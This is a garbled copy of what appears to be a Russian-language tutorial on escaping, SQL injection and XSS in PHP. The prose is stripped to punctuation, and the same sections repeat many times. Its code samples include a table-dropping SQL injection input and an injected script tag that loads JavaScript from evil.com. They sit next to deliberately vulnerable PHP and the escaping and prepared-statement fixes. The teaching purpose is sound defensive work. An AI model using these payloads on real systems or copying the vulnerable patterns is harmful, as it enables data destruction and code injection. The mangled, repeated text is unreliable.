SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).

? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>

htmlspecialchars , , . :

<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>

, , , "". HTML .



...

, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .





, , , :

Validation

, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization

"" , . , - HTML-, . , .

Prepared SQL statements

, , : SQL- , . :

$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);

, . , .





, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
 ?   ,    -  ?  XML -  .   .  .       ,  -      ,         i    . 
    

, - .

<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents> </article>


, . "&lt;" "<", "&gt;" - ">".

- , , , .

escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]

, , , , . , , : " , ?" .

, (&) - . , "&lt;", "<"? XML, escape- &, - " &amp; ", .. : " &amp;&lt; "





XML - "" . , :

var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";

- " " . :

var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";

! ! , , , -?

var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";

... , . , . . - , " ", . :

var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";

"\" . , -, , "\" - . , , : "\\". , ?



!

, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .



- SQL . SQL - , :

SELECT phone_number FROM users WHERE name = 'Alex'

, . , SQL . , :

$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);

, . "", , , , . , - .



, , -, . , :

$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, : - -! , - ! ! , - , ! !



, . $_POST['name'] - , -. SQL-, , . SQL "" .



, ? , - :



Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'

, , ? 2, , "" - '. ! 4 - . ? ...

, ... , . , - : Joe, users ( '), .



. , , , , , 10 . SQL-, . , , , , , .. , - "" .



!

: XSS . , HTML.

, , , -, . , , .. - - :

<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>

, , :

<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>

, , , , :

<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>

... . , , , ?



<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>

, , ? - javascript ? , , , . .





, - , , ! , "" , , . ?



? , ? , , ""? , !

, . - :

$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);

, "" . SQL-, :

Alex

SELECT phone_number FROM users WHERE name = 'Alex'

Mc'Donalds

SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'

Joe'; DROP TABLE users; --

SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'

mysql_real_escape_string , - .



, :

